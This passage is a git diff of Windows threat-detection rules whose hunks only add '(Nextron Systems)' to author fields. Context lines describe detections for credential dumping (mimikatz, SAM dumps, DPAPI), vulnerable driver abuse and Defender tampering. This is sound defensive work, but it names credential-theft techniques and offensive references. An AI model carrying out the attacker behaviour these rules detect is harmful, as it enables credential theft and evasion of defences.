a/rules/windows/builtin/system/win_system_susp_rtcore64_service_install.yml b/rules/windows/builtin/system/win_system_susp_rtcore64_service_install.yml index 82202a50d..c2c464722 100644 --- a/rules/windows/builtin/system/win_system_susp_rtcore64_service_install.yml +++ b/rules/windows/builtin/system/win_system_susp_rtcore64_service_install.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse references: - https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/30 tags: - attack.persistence diff --git a/rules/windows/builtin/system/win_system_susp_sam_dump.yml b/rules/windows/builtin/system/win_system_susp_sam_dump.yml index 0457bd61c..76d470125 100644 --- a/rules/windows/builtin/system/win_system_susp_sam_dump.yml +++ b/rules/windows/builtin/system/win_system_susp_sam_dump.yml @@ -2,7 +2,7 @@ title: SAM Dump to AppData id: 839dd1e8-eda8-4834-8145-01beeee33acd status: test description: Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/01/27 modified: 2022/04/14 tags: diff --git a/rules/windows/builtin/system/win_system_susp_service_installation.yml b/rules/windows/builtin/system/win_system_susp_service_installation.yml index 350de7e69..4a51ca660 100644 --- a/rules/windows/builtin/system/win_system_susp_service_installation.yml +++ b/rules/windows/builtin/system/win_system_susp_service_installation.yml @@ -2,7 +2,7 @@ title: Suspicious Service Installation id: 1d61f71d-59d2-479e-9562-4ff5f4ead16b status: experimental description: Detects suspicious service installation commands -author: pH-T +author: pH-T (Nextron Systems) date: 2022/03/18 modified: 2022/11/14 tags: diff --git a/rules/windows/builtin/system/win_system_susp_service_installation_folder.yml b/rules/windows/builtin/system/win_system_susp_service_installation_folder.yml index ce7cafec7..249ee47fe 100644 --- a/rules/windows/builtin/system/win_system_susp_service_installation_folder.yml +++ b/rules/windows/builtin/system/win_system_susp_service_installation_folder.yml @@ -2,7 +2,7 @@ title: Service Installation in Suspicious Folder id: 5e993621-67d4-488a-b9ae-b420d08b96cb status: experimental description: Detects service installation in suspicious folder appdata -author: pH-T +author: pH-T (Nextron Systems) date: 2022/03/18 modified: 2022/10/12 tags: diff --git a/rules/windows/builtin/system/win_system_susp_service_installation_folder_pattern.yml b/rules/windows/builtin/system/win_system_susp_service_installation_folder_pattern.yml index 595b0eeeb..afa79606d 100644 --- a/rules/windows/builtin/system/win_system_susp_service_installation_folder_pattern.yml +++ b/rules/windows/builtin/system/win_system_susp_service_installation_folder_pattern.yml @@ -2,7 +2,7 @@ title: Service Installation with Suspicious Folder Pattern id: 1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2 status: test description: Detects service installation with suspicious folder patterns -author: pH-T +author: pH-T (Nextron Systems) date: 2022/03/18 modified: 2022/03/24 tags: diff --git a/rules/windows/builtin/system/win_system_susp_service_installation_script.yml b/rules/windows/builtin/system/win_system_susp_service_installation_script.yml index cd226771f..7879372ae 100644 --- a/rules/windows/builtin/system/win_system_susp_service_installation_script.yml +++ b/rules/windows/builtin/system/win_system_susp_service_installation_script.yml @@ -2,7 +2,7 @@ title: Suspicious Service Installation Script id: 70f00d10-60b2-4f34-b9a0-dc3df3fe762a status: experimental description: Detects suspicious service installation scripts -author: pH-T +author: pH-T (Nextron Systems) date: 2022/03/18 modified: 2022/11/18 tags: diff --git a/rules/windows/builtin/taskscheduler/win_taskscheduler_rare_schtask_creation.yml b/rules/windows/builtin/taskscheduler/win_taskscheduler_rare_schtask_creation.yml index c614618fc..614950c83 100644 --- a/rules/windows/builtin/taskscheduler/win_taskscheduler_rare_schtask_creation.yml +++ b/rules/windows/builtin/taskscheduler/win_taskscheduler_rare_schtask_creation.yml @@ -2,7 +2,7 @@ title: Rare Scheduled Task Creations id: b20f6158-9438-41be-83da-a5a16ac90c2b status: test description: This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names. -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/03/17 modified: 2021/12/28 tags: diff --git a/rules/windows/builtin/taskscheduler/win_taskscheduler_susp_task_locations.yml b/rules/windows/builtin/taskscheduler/win_taskscheduler_susp_task_locations.yml index 3a4008f9c..8e0292202 100644 --- a/rules/windows/builtin/taskscheduler/win_taskscheduler_susp_task_locations.yml +++ b/rules/windows/builtin/taskscheduler/win_taskscheduler_susp_task_locations.yml @@ -2,7 +2,7 @@ title: Suspicious Scheduled Tasks Locations id: 424273ea-7cf8-43a6-b712-375f925e481f status: experimental description: Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/05 tags: - attack.persistence diff --git a/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml b/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml index 8748fbc4e..3db26733c 100644 --- a/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml +++ b/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml @@ -5,7 +5,7 @@ description: Detects cases in which ngrok, a reverse proxy tool, forwards events references: - https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg - https://ngrok.com/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/04/29 tags: - attack.command_and_control diff --git a/rules/windows/builtin/win_alert_mimikatz_keywords.yml b/rules/windows/builtin/win_alert_mimikatz_keywords.yml index e9da431ba..5a985b573 100644 --- a/rules/windows/builtin/win_alert_mimikatz_keywords.yml +++ b/rules/windows/builtin/win_alert_mimikatz_keywords.yml @@ -4,7 +4,7 @@ status: test description: This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups) references: - https://tools.thehacker.recipes/mimikatz/modules -author: Florian Roth (rule), David ANDRE (additional keywords) +author: Florian Roth (Nextron Systems), David ANDRE (additional keywords) date: 2017/01/10 modified: 2022/01/05 tags: diff --git a/rules/windows/builtin/windefend/win_defender_exclusions.yml b/rules/windows/builtin/windefend/win_defender_exclusions.yml index 9ecb61821..01079979e 100644 --- a/rules/windows/builtin/windefend/win_defender_exclusions.yml +++ b/rules/windows/builtin/windefend/win_defender_exclusions.yml @@ -4,7 +4,7 @@ status: stable description: Detects the Setting of Windows Defender Exclusions references: - https://twitter.com/_nullbind/status/1204923340810543109 -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/07/06 modified: 2022/12/06 tags: diff --git a/rules/windows/builtin/windefend/win_defender_exploit_guard_tamper.yml b/rules/windows/builtin/windefend/win_defender_exploit_guard_tamper.yml index 692e62478..ad13c4915 100644 --- a/rules/windows/builtin/windefend/win_defender_exploit_guard_tamper.yml +++ b/rules/windows/builtin/windefend/win_defender_exploit_guard_tamper.yml @@ -4,7 +4,7 @@ status: experimental description: Detects when someone is adding or removing applications or folder from exploit guard "ProtectedFolders" and "AllowedApplications" references: - https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/05 modified: 2022/12/06 tags: diff --git a/rules/windows/builtin/windefend/win_defender_restored_quarantine_file.yml b/rules/windows/builtin/windefend/win_defender_restored_quarantine_file.yml index 81aea09c4..428412495 100644 --- a/rules/windows/builtin/windefend/win_defender_restored_quarantine_file.yml +++ b/rules/windows/builtin/windefend/win_defender_restored_quarantine_file.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the restoration of files from the defender quarantine references: - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/06 tags: - attack.defense_evasion diff --git a/rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml b/rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml index 1aa0edf42..dc4ec9c8e 100644 --- a/rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml +++ b/rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml @@ -10,7 +10,7 @@ description: Detects suspicious changes to the windows defender configuration references: - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide - https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/06 tags: - attack.defense_evasion diff --git a/rules/windows/builtin/wmi/win_wmi_persistence.yml b/rules/windows/builtin/wmi/win_wmi_persistence.yml index 1658f997e..70ab63098 100644 --- a/rules/windows/builtin/wmi/win_wmi_persistence.yml +++ b/rules/windows/builtin/wmi/win_wmi_persistence.yml @@ -5,7 +5,7 @@ description: Detects suspicious WMI event filter and command line event consumer references: - https://twitter.com/mattifestation/status/899646620148539397 - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/ -author: Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community +author: Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community date: 2017/08/22 modified: 2022/02/10 tags: diff --git a/rules/windows/create_remote_thread/create_remote_thread_win_bumblebee.yml b/rules/windows/create_remote_thread/create_remote_thread_win_bumblebee.yml index 63d3deebd..a4a32a992 100644 --- a/rules/windows/create_remote_thread/create_remote_thread_win_bumblebee.yml +++ b/rules/windows/create_remote_thread/create_remote_thread_win_bumblebee.yml @@ -4,7 +4,7 @@ status: experimental description: Detects remote thread injection events based on action seen used by bumblebee references: - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/27 tags: - attack.defense_evasion diff --git a/rules/windows/create_remote_thread/create_remote_thread_win_cobaltstrike_process_injection.yml b/rules/windows/create_remote_thread/create_remote_thread_win_cobaltstrike_process_injection.yml index 63e9abc70..2759aebda 100644 --- a/rules/windows/create_remote_thread/create_remote_thread_win_cobaltstrike_process_injection.yml +++ b/rules/windows/create_remote_thread/create_remote_thread_win_cobaltstrike_process_injection.yml @@ -5,7 +5,7 @@ description: Detects a possible remote threat creation with certain characterist references: - https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f - https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/ -author: Olaf Hartong, Florian Roth, Aleksey Potapov, oscd.community +author: Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community date: 2018/11/30 modified: 2022/12/25 tags: diff --git a/rules/windows/create_remote_thread/create_remote_thread_win_susp_powershell_rundll32.yml b/rules/windows/create_remote_thread/create_remote_thread_win_susp_powershell_rundll32.yml index e74f78bcc..270ebf9df 100644 --- a/rules/windows/create_remote_thread/create_remote_thread_win_susp_powershell_rundll32.yml +++ b/rules/windows/create_remote_thread/create_remote_thread_win_susp_powershell_rundll32.yml @@ -4,7 +4,7 @@ status: experimental description: Detects PowerShell remote thread creation in Rundll32.exe references: - https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/06/25 modified: 2022/07/14 tags: diff --git a/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_target.yml b/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_target.yml index d94edda2d..e2078d1fb 100644 --- a/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_target.yml +++ b/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_target.yml @@ -7,7 +7,7 @@ description: | It is a generalistic rule, but it should have a low FP ratio due to the selected range of processes. references: - https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/08/25 modified: 2022/08/29 logsource: diff --git a/rules/windows/create_remote_thread/create_remote_thread_win_susp_targets.yml b/rules/windows/create_remote_thread/create_remote_thread_win_susp_targets.yml index 197553068..b5f21ce85 100644 --- a/rules/windows/create_remote_thread/create_remote_thread_win_susp_targets.yml +++ b/rules/windows/create_remote_thread/create_remote_thread_win_susp_targets.yml @@ -4,7 +4,7 @@ status: experimental description: Detects a remote thread creation in suspicious target images references: - https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/03/16 modified: 2022/09/29 tags: diff --git a/rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml b/rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml index db4b02263..4148840e1 100644 --- a/rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml +++ b/rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml @@ -4,7 +4,7 @@ status: test description: Detects the creation of an ADS data stream that contains an executable (non-empty imphash) references: - https://twitter.com/0xrawsec/status/1002478725605273600?s=21 -author: Florian Roth, @0xrawsec +author: Florian Roth (Nextron Systems), @0xrawsec date: 2018/06/03 modified: 2022/12/30 tags: diff --git a/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml b/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml index e756ff433..ef49d1f52 100644 --- a/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml +++ b/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the creation of a file on disk that has an imphash of a well-known hack tool references: - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/08/24 modified: 2022/12/30 tags: diff --git a/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo.yml b/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo.yml index 0ed232b58..bb0e9d37a 100644 --- a/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo.yml +++ b/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo.yml @@ -5,7 +5,7 @@ description: Detects the download of suspicious file type from a well-known file references: - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015 - https://www.cisa.gov/uscert/ncas/alerts/aa22-321a -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/08/24 modified: 2023/01/19 tags: diff --git a/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo_med.yml b/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo_med.yml index 894c9c4c8..275c5143a 100644 --- a/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo_med.yml +++ b/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo_med.yml @@ -5,7 +5,7 @@ description: Detects the download of suspicious file type from a well-known file references: - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015 - https://www.cisa.gov/uscert/ncas/alerts/aa22-321a -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/08/24 modified: 2023/01/19 tags: diff --git a/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml b/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml index c8d2af60c..697fabe2c 100644 --- a/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml +++ b/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the download of suspicious file type from URLs with IP references: - https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md -author: Nasreddine Bencherchali, Florian Roth +author: Nasreddine Bencherchali (Nextron Systems), Florian Roth date: 2022/09/07 modified: 2022/12/05 tags: diff --git a/rules/windows/dns_query/dns_query_win_anonymfiles_com.yml b/rules/windows/dns_query/dns_query_win_anonymfiles_com.yml index 23d3b71dd..e170875b2 100644 --- a/rules/windows/dns_query/dns_query_win_anonymfiles_com.yml +++ b/rules/windows/dns_query/dns_query_win_anonymfiles_com.yml @@ -7,7 +7,7 @@ status: experimental description: Detects DNS queries for "anonfiles.com", which is an anonymous file upload platform often used for malicious purposes references: - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte -author: pH-T +author: pH-T (Nextron Systems) date: 2022/07/15 modified: 2023/01/16 tags: diff --git a/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml b/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml index eb3e5fc11..d9acf4aea 100644 --- a/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml +++ b/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml @@ -8,7 +8,7 @@ description: Detects a program that invoked suspicious DNS queries known from Co references: - https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns - https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/11/09 modified: 2023/01/16 tags: diff --git a/rules/windows/dns_query/dns_query_win_susp_teamviewer.yml b/rules/windows/dns_query/dns_query_win_susp_teamviewer.yml index b445a9c6a..5237cd85a 100644 --- a/rules/windows/dns_query/dns_query_win_susp_teamviewer.yml +++ b/rules/windows/dns_query/dns_query_win_susp_teamviewer.yml @@ -4,7 +4,7 @@ status: test description: Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation) references: - https://www.teamviewer.com/en-us/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/01/30 modified: 2022/02/08 tags: diff --git a/rules/windows/driver_load/driver_load_win_mal_creddumper.yml b/rules/windows/driver_load/driver_load_win_mal_creddumper.yml index d6792b13b..593bfeae4 100644 --- a/rules/windows/driver_load/driver_load_win_mal_creddumper.yml +++ b/rules/windows/driver_load/driver_load_win_mal_creddumper.yml @@ -7,7 +7,7 @@ status: test description: Detects well-known credential dumping tools execution via service execution events references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment -author: Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community +author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community date: 2017/03/05 modified: 2022/12/25 tags: diff --git a/rules/windows/driver_load/driver_load_win_mal_poortry_driver.yml b/rules/windows/driver_load/driver_load_win_mal_poortry_driver.yml index 60ffcf498..db3b014f9 100644 --- a/rules/windows/driver_load/driver_load_win_mal_poortry_driver.yml +++ b/rules/windows/driver_load/driver_load_win_mal_poortry_driver.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One. references: - https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/16 modified: 2022/12/30 tags: diff --git a/rules/windows/driver_load/driver_load_win_process_hacker.yml b/rules/windows/driver_load/driver_load_win_process_hacker.yml index b6f1bd10a..bb8a2f190 100644 --- a/rules/windows/driver_load/driver_load_win_process_hacker.yml +++ b/rules/windows/driver_load/driver_load_win_process_hacker.yml @@ -6,7 +6,7 @@ references: - https://processhacker.sourceforge.io/ - https://systeminformer.sourceforge.io/ - https://github.com/winsiderss/systeminformer -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/11/16 modified: 2022/12/30 tags: diff --git a/rules/windows/driver_load/driver_load_win_susp_temp_use.yml b/rules/windows/driver_load/driver_load_win_susp_temp_use.yml index 50c864855..57e609ae7 100644 --- a/rules/windows/driver_load/driver_load_win_susp_temp_use.yml +++ b/rules/windows/driver_load/driver_load_win_susp_temp_use.yml @@ -2,7 +2,7 @@ title: Suspicious Driver Load from Temp id: 2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75 status: test description: Detects a driver load from a temporary directory -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/02/12 modified: 2021/11/27 tags: diff --git a/rules/windows/driver_load/driver_load_win_vuln_avast_anti_rootkit_driver.yml b/rules/windows/driver_load/driver_load_win_vuln_avast_anti_rootkit_driver.yml index 0bc040cb0..c52625a1f 100644 --- a/rules/windows/driver_load/driver_load_win_vuln_avast_anti_rootkit_driver.yml +++ b/rules/windows/driver_load/driver_load_win_vuln_avast_anti_rootkit_driver.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products references: - https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/28 modified: 2022/12/30 tags: diff --git a/rules/windows/driver_load/driver_load_win_vuln_dell_driver.yml b/rules/windows/driver_load/driver_load_win_vuln_dell_driver.yml index f776c8f90..936bc705d 100644 --- a/rules/windows/driver_load/driver_load_win_vuln_dell_driver.yml +++ b/rules/windows/driver_load/driver_load_win_vuln_dell_driver.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551 references: - https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/05/05 modified: 2022/12/30 tags: diff --git a/rules/windows/driver_load/driver_load_win_vuln_drivers.yml b/rules/windows/driver_load/driver_load_win_vuln_drivers.yml index b18a9b80a..4389e211d 100644 --- a/rules/windows/driver_load/driver_load_win_vuln_drivers.yml +++ b/rules/windows/driver_load/driver_load_win_vuln_drivers.yml @@ -19,7 +19,7 @@ references: - https://www.rapid7.com/db/modules/exploit/windows/local/razer_zwopenprocess/ - https://www.unknowncheats.me/forum/downloads.php?do=file&id=25444 - https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/18 modified: 2023/01/11 tags: diff --git a/rules/windows/driver_load/driver_load_win_vuln_drivers_names.yml b/rules/windows/driver_load/driver_load_win_vuln_drivers_names.yml index 9190cabce..ebfeeedd7 100644 --- a/rules/windows/driver_load/driver_load_win_vuln_drivers_names.yml +++ b/rules/windows/driver_load/driver_load_win_vuln_drivers_names.yml @@ -18,7 +18,7 @@ references: - https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/ - https://eclypsium.com/2019/11/12/mother-of-all-drivers/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37969 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/03 modified: 2023/01/11 tags: diff --git a/rules/windows/driver_load/driver_load_win_vuln_gigabyte_driver.yml b/rules/windows/driver_load/driver_load_win_vuln_gigabyte_driver.yml index 23430aa01..b16591f85 100644 --- a/rules/windows/driver_load/driver_load_win_vuln_gigabyte_driver.yml +++ b/rules/windows/driver_load/driver_load_win_vuln_gigabyte_driver.yml @@ -8,7 +8,7 @@ references: - https://github.com/fengjixuchui/gdrv-loader - https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details - https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/07/25 modified: 2022/12/30 tags: diff --git a/rules/windows/driver_load/driver_load_win_vuln_hevd_driver.yml b/rules/windows/driver_load/driver_load_win_vuln_hevd_driver.yml index 2b3b1ecee..cbedf223d 100644 --- a/rules/windows/driver_load/driver_load_win_vuln_hevd_driver.yml +++ b/rules/windows/driver_load/driver_load_win_vuln_hevd_driver.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors references: - https://github.com/hacksysteam/HackSysExtremeVulnerableDriver -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/18 modified: 2022/11/19 tags: diff --git a/rules/windows/driver_load/driver_load_win_vuln_hw_driver.yml b/rules/windows/driver_load/driver_load_win_vuln_hw_driver.yml index a3cd49955..bd53bf26a 100644 --- a/rules/windows/driver_load/driver_load_win_vuln_hw_driver.yml +++ b/rules/windows/driver_load/driver_load_win_vuln_hw_driver.yml @@ -5,7 +5,7 @@ description: Detects the load of a legitimate signed driver named HW.sys by ofte references: - https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/ - https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/07/26 modified: 2022/12/30 tags: diff --git a/rules/windows/driver_load/driver_load_win_vuln_lenovo_driver.yml b/rules/windows/driver_load/driver_load_win_vuln_lenovo_driver.yml index 92d286c44..e46ea3847 100644 --- a/rules/windows/driver_load/driver_load_win_vuln_lenovo_driver.yml +++ b/rules/windows/driver_load/driver_load_win_vuln_lenovo_driver.yml @@ -5,7 +5,7 @@ description: Detects the load of the vulnerable Lenovo driver as reported in CVE references: - https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities - https://github.com/alfarom256/CVE-2022-3699/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/11/10 modified: 2022/12/30 tags: diff --git a/rules/windows/driver_load/driver_load_win_vuln_winring0_driver.yml b/rules/windows/driver_load/driver_load_win_vuln_winring0_driver.yml index 57fe1d4dc..3e63dc070 100644 --- a/rules/windows/driver_load/driver_load_win_vuln_winring0_driver.yml +++ b/rules/windows/driver_load/driver_load_win_vuln_winring0_driver.yml @@ -5,7 +5,7 @@ description: Detects the load of a signed WinRing0 driver often used by threat a references: - https://github.com/xmrig/xmrig/tree/master/bin/WinRing0 - https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/07/26 modified: 2022/11/19 tags: diff --git a/rules/windows/driver_load/driver_load_win_windivert.yml b/rules/windows/driver_load/driver_load_win_windivert.yml index 3910b8002..4c23f5677 100644 --- a/rules/windows/driver_load/driver_load_win_windivert.yml +++ b/rules/windows/driver_load/driver_load_win_windivert.yml @@ -5,7 +5,7 @@ description: Detects the load of the Windiver driver, a powerful user-mode captu references: - https://reqrypt.org/windivert-doc.html - https://rastamouse.me/ntlm-relaying-via-cobalt-strike/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/07/30 modified: 2022/11/19 tags: diff --git a/rules/windows/file/file_access/file_access_win_credential_manager_stealing.yml b/rules/windows/file/file_access/file_access_win_credential_manager_stealing.yml index c6f7445de..4ef585297 100644 --- a/rules/windows/file/file_access/file_access_win_credential_manager_stealing.yml +++ b/rules/windows/file/file_access/file_access_win_credential_manager_stealing.yml @@ -7,7 +7,7 @@ description: | references: - https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/11 tags: - attack.t1003 diff --git a/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml b/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml index 2fd3ea828..3b7a8d376 100644 --- a/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml +++ b/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml @@ -7,7 +7,7 @@ description: | references: - https://web.archive.org/web/20181130065817/http://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/ - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/17 tags: - attack.credential_access diff --git a/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml b/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml index fb7d89475..80374f728 100644 --- a/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml +++ b/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml @@ -7,7 +7,7 @@ description: | references: - https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist - https://www.passcape.com/windows_password_recovery_dpapi_credhist -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/17 tags: - attack.credential_access diff --git a/rules/windows/file/file_delete/file_delete_win_exchange_powershell_logs.yml b/rules/windows/file/file_delete/file_delete_win_exchange_powershell_logs.yml index 9342cfd8d..247ab5363 100644 --- a/rules/windows/file/file_delete/file_delete_win_exchange_powershell_logs.yml +++ b/rules/windows/file/file_delete/file_delete_win_exchange_powershell_logs.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence references: - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali 